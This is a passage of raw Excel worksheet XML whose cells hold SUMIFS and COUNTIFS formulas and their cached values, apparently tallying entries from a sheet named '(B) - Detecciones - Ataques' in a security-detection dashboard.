        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>2</v>
      </c>
      <c r="CQ67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>0</v>
      </c>
      <c r="CR67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>0</v>
      </c>
      <c r="CT67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>6</v>
      </c>
      <c r="CU67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>0</v>
      </c>
      <c r="CY67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>1</v>
      </c>
      <c r="CZ67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>0</v>
      </c>
      <c r="DE67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>5</v>
      </c>
      <c r="DF67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>450</v>
      </c>
      <c r="DI67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ67" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>11</v>
      </c>
      <c r="DK67" s="271"/>
      <c r="DO67" s="279"/>
      <c r="DP67" s="271"/>
      <c r="DQ67" s="271"/>
      <c r="DR67" s="271"/>
      <c r="DS67" s="271"/>
      <c r="DT67" s="271"/>
      <c r="DU67" s="271"/>
      <c r="DV67" s="271"/>
      <c r="DW67" s="271"/>
      <c r="DX67" s="271"/>
      <c r="DY67" s="271"/>
      <c r="DZ67" s="271"/>
      <c r="EA67" s="271"/>
      <c r="EB67" s="271"/>
      <c r="EC67" s="271"/>
      <c r="ED67" s="280"/>
      <c r="EG67" s="279"/>
      <c r="EH67" s="271"/>
      <c r="EI67" s="271"/>
      <c r="EJ67" s="271"/>
      <c r="EK67" s="271"/>
      <c r="EL67" s="271"/>
      <c r="EM67" s="271"/>
      <c r="EN67" s="271"/>
      <c r="EO67" s="271"/>
      <c r="EP67" s="271"/>
      <c r="EQ67" s="483"/>
      <c r="ER67" s="478"/>
      <c r="ES67" s="478"/>
      <c r="ET67" s="478"/>
      <c r="EU67" s="478"/>
      <c r="EV67" s="478"/>
      <c r="EW67" s="478"/>
      <c r="EX67" s="478"/>
      <c r="EY67" s="478"/>
      <c r="EZ67" s="478"/>
      <c r="FA67" s="479"/>
      <c r="FD67" s="480"/>
      <c r="FG67" s="491" t="s">
        <v>8</v>
      </c>
      <c r="FH67" s="69">
        <v>0.09523809523809523</v>
      </c>
      <c r="FI67" s="368">
        <f>EL66</f>
        <v>0.6689189189</v>
      </c>
      <c r="FM67" s="480"/>
      <c r="FN67" s="480"/>
      <c r="FO67" s="480"/>
      <c r="FP67" s="480"/>
      <c r="FQ67" s="480"/>
      <c r="FR67" s="480"/>
      <c r="FS67" s="480"/>
      <c r="FT67" s="480"/>
      <c r="FU67" s="480"/>
      <c r="FV67" s="480"/>
      <c r="FW67" s="480"/>
      <c r="FX67" s="480"/>
      <c r="FY67" s="379" t="s">
        <v>951</v>
      </c>
      <c r="FZ67" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY50)+SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY50 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY50)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY50 &amp; "*"))</f>
        <v>0.3760526316</v>
      </c>
      <c r="GA67" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY50)+SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY50 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY50)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY50 &amp; "*"))</f>
        <v>0.4</v>
      </c>
      <c r="GB67" s="480"/>
      <c r="GC67" s="379" t="s">
        <v>951</v>
      </c>
      <c r="GD67" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY50)+SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY50 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY50)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY50 &amp; "*"))</f>
        <v>0.448433584</v>
      </c>
      <c r="GE67" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY50)+SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY50 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY50)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY50 &amp; "*"))</f>
        <v>0.5</v>
      </c>
      <c r="GF67" s="480"/>
      <c r="GG67" s="480"/>
      <c r="GH67" s="480"/>
      <c r="GI67" s="480"/>
      <c r="GJ67" s="480"/>
      <c r="GK67" s="480"/>
      <c r="GL67" s="480"/>
      <c r="GM67" s="480"/>
      <c r="GN67" s="480"/>
      <c r="GO67" s="480"/>
      <c r="GP67" s="480"/>
      <c r="GQ67" s="480"/>
      <c r="GR67" s="480"/>
      <c r="GS67" s="480"/>
      <c r="GT67" s="480"/>
      <c r="GU67" s="480"/>
      <c r="GV67" s="480"/>
      <c r="GW67" s="480"/>
      <c r="GX67" s="480"/>
      <c r="GY67" s="480"/>
      <c r="GZ67" s="480"/>
      <c r="HA67" s="480"/>
      <c r="HB67" s="480"/>
      <c r="HC67" s="480"/>
      <c r="HD67" s="480"/>
      <c r="HE67" s="480"/>
      <c r="HF67" s="480"/>
      <c r="HG67" s="480"/>
      <c r="HH67" s="480"/>
      <c r="HI67" s="480"/>
      <c r="HJ67" s="480"/>
      <c r="HK67" s="480"/>
      <c r="HL67" s="480"/>
      <c r="HM67" s="480"/>
      <c r="HN67" s="480"/>
      <c r="HO67" s="480"/>
      <c r="HP67" s="480"/>
    </row>
    <row r="68">
      <c r="J68" s="277"/>
      <c r="K68" s="271"/>
      <c r="L68" s="271"/>
      <c r="M68" s="271"/>
      <c r="N68" s="271"/>
      <c r="O68" s="278"/>
      <c r="Q68" s="271"/>
      <c r="R68" s="352" t="s">
        <v>2535</v>
      </c>
      <c r="S68" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>10066</v>
      </c>
      <c r="T68" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>9998</v>
      </c>
      <c r="U68" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>16</v>
      </c>
      <c r="V68" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>8</v>
      </c>
      <c r="W68" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X68" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="Y68" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>792</v>
      </c>
      <c r="Z68" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>7634</v>
      </c>
      <c r="AA68" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>25</v>
      </c>
      <c r="AB68" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>20</v>
      </c>
      <c r="AC68" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>24</v>
      </c>
      <c r="AD68" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>1773</v>
      </c>
      <c r="AE68" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>53</v>
      </c>
      <c r="AF68" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>19</v>
      </c>
      <c r="AG68" s="271"/>
      <c r="AH68" s="352" t="s">
        <v>2535</v>
      </c>
      <c r="AI68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>10064</v>
      </c>
      <c r="AJ68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>1</v>
      </c>
      <c r="AL68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>9998</v>
      </c>
      <c r="AN68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>3</v>
      </c>
      <c r="AR68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>4</v>
      </c>
      <c r="AS68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>3</v>
      </c>
      <c r="AU68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>4</v>
      </c>
      <c r="AV68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>2</v>
      </c>
      <c r="AW68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>8</v>
      </c>
      <c r="AY68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>0</v>
      </c>
      <c r="BA68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>1</v>
      </c>
      <c r="BD68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>792</v>
      </c>
      <c r="BI68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>0</v>
      </c>
      <c r="BL68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>0</v>
      </c>
      <c r="BM68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>658</v>
      </c>
      <c r="BN68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>6976</v>
      </c>
      <c r="BO68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>0</v>
      </c>
      <c r="BR68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>0</v>
      </c>
      <c r="BT68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>0</v>
      </c>
      <c r="BU68" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV68" s="355">
